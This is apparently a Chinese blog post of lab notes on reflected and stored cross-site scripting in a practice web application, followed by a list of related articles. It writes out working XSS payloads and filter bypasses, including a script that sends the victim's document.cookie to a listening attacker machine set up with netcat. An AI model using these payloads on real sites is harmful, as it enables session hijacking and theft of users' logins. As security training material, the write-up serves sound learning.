Xss-reflected/stored跨站脚本分析(Cross site scripting)
Xss-reflected/stored跨站脚本分析(Cross site scripting)
基础知识
针对Dom - dochtml
Url概念:协议+网址/dns+端口+路径
XSS原理:对URL中的参数和对用户输入提交给web server的内容,没有进行充分的过滤。如果我们能够在web程序中对用户提交的URL中的参数,和提交的所有内容进行充分的过滤,将所有的不合法的参数和输入内容过滤掉,那么就不会导致“在用户的浏览器中执行攻击者自己定制的脚本”。
?name=<script>alert(document.cookie)</script>#
Php 会话id
Kali监听
Nc -nvlp 测试网络连通性
- ip地址、不用域名 v-详细输出 l-监听模式 p-端口号
192.168.184.195
新建标签
<script>var img=document.createElement("img");img.src="http://192.168.8.128:1234/?a="+escape(document.cookie);</script>#
Post 上传参数
Get获取参数
状态数值:
100
200 ok
400 服务器客户端问题
500 服务器客户端问题
实训过程
Reflected型
初级:直接写脚本语言
?name=<script>alert(document.cookie)</script>#
中级:大小写绕过、双写绕过
此处将<script>替换成了空格,所以可以大小写绕过或双写绕过
<scRipt>alert("666")</sCript>
<sc<script>ript>alert("666")</sc<script>ript>
高级:标签绕过
由源码可知,通配符过滤了/ script 而且无关大小写
<img src=1 οnerrοr=alert(document.cookie)>
<body οnlοad=alert(document.cookie)>
原理
stored型
看源代码,Name和message相比,防护性较低
其中:
stripslashes() 删除字符串中的反斜杠 /
mysqli_real_escape_string() 对特殊字符进行转意 \n \r \t
所以无法直接在前端上传脚本,用bp抓包,修改数据后,再发给服务器即可
初级:bp抓包,改数据,写脚本
中级:大小写绕过、双写绕过
<scRipt>alert("666")</sCript>
<sc<script>ript>alert("666")</sc<script>ript>
高级:标签绕过
<img src=1 οnerrοr=alert(document.cookie)>
<body οnlοad=alert(document.cookie)>
结果验证:均可弹出cookie窗口
Xss-reflected/stored跨站脚本分析(Cross site scripting)相关推荐
- 跨站脚本攻击(Cross‐Site Scripting (XSS))实践
作者发现博客园在首页显示摘要时未做html标签的过滤,致使摘要中的html代码可以被执行,从而可以注入任何想要被执行的js代码,作者利用这一缺陷在本文摘要中插入了一段js代码执行alert弹窗,同时增 ...
- Reflected Cross Site Scripting (XSS)
前言 反射型XSS, 即 Reflected Cross Site Scripting (XSS), 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的 页 ...
- DVWA V1.9:Reflected Cross Site Scripting(存储型XSS)
DVWA V1.9:Reflected Cross Site Scripting(存储型XSS) 存储型 XSS 介绍 Low 级别 核心代码 官方提示 漏洞利用 Medium 级别 核心代码 官方提 ...
- XSS(Cross Site Scripting)攻击简介
环境 Ubuntu 22.04 IntelliJ IDEA 2022.1.3 JDK 17.0.3.1 Spring Boot 3.0.1 Firefox 108.0.2 问题和分析 在Intelli ...
- 【常见Web应用安全问题】---1、Cross Site Scripting
Web应用程序的安全性问题依其存在的形势划分,种类繁多,这里不准备介绍所有的,只介绍常见的一些. 常见Web应用安全问题安全性问题的列表: 1.跨站脚本攻击(CSS or XSS, Cross Si ...
- XSSF - Cross Site Scripting Framework
2019独角兽企业重金招聘Python工程师标准>>> 跨站脚本框架 (XSSF) 是一个设计用来快速发现网站存在XSS漏洞的一个安全工具集. 该项目是为了验证网站存在的XSS漏洞及 ...
- Cross Site Scripting DOM攻击jQuery append() 的处理方法
做安全红线使用Fortify工具进行扫描时,jquery append会报Cross Site Scripting DOM风险.解决该问题有两种办法. 一.原生dom方式 使用JavaScript原生 ...
- CHECKMARX安全漏洞检测防止XSS(Cross Site Scripting)跨站脚本攻击
CHECKMARX安全漏洞检测防止XSS跨站脚本攻击 总结CHECKMARX软件安全检测报告高危风险漏洞处理方式 高危警告内容 This can enable a Reflected Cross-Si ...
- DVWA关卡11:Reflected Cross Site Scripting (XSS)(反射型XSS)
目录 Low Medium High Impossible 反射型XSS:恶意脚本未经转义被直接输入并作为HTML输出的一部分,恶意脚本不在后台存储,直接在前端浏览器被执行. 攻击者可以使用XSS向恶 ...
最新文章
- 如何通过 Serverless 轻松识别验证码?
- 转:国外科技论文写作资源
- maven provided
- phpMyAdmin导入大的sql文件
- QT高级编程之QT基本概览
- org.apache.poi.POIXMLException: java.lang.reflect.InvocationTargetException
- 【C++实现python字符串函数库】strip、lstrip、rstrip方法
- 面向对象程序设计的思想的长处
- MFC 简单输出EXCEL - (OLE)
- 手机WIFI的上行下行速度不同
- otdr进行多种测试鸿蒙包括,OTDR 测试
- C语言程序输入一个三位数取个位十位百位
- 在线html解压,javascript实现网页端解压并查看zip文件
- ap mt7260a 华硕_带你入坑,用MT7620A带USB口的路由器搭建一个私有网盘
- ALOHA协议和CSMA协议
- 操作系统进程进行系统调用详细过程
- Softing pnGate系列网关:将PROFIBUS总线集成到PROFINET网络
- 胡爱玲医生论中医治疗荨麻疹的优势和理念
- 关于Linux下C语言编程execvp函数的一个问题
- C语言结构体(struct)的几种定义方式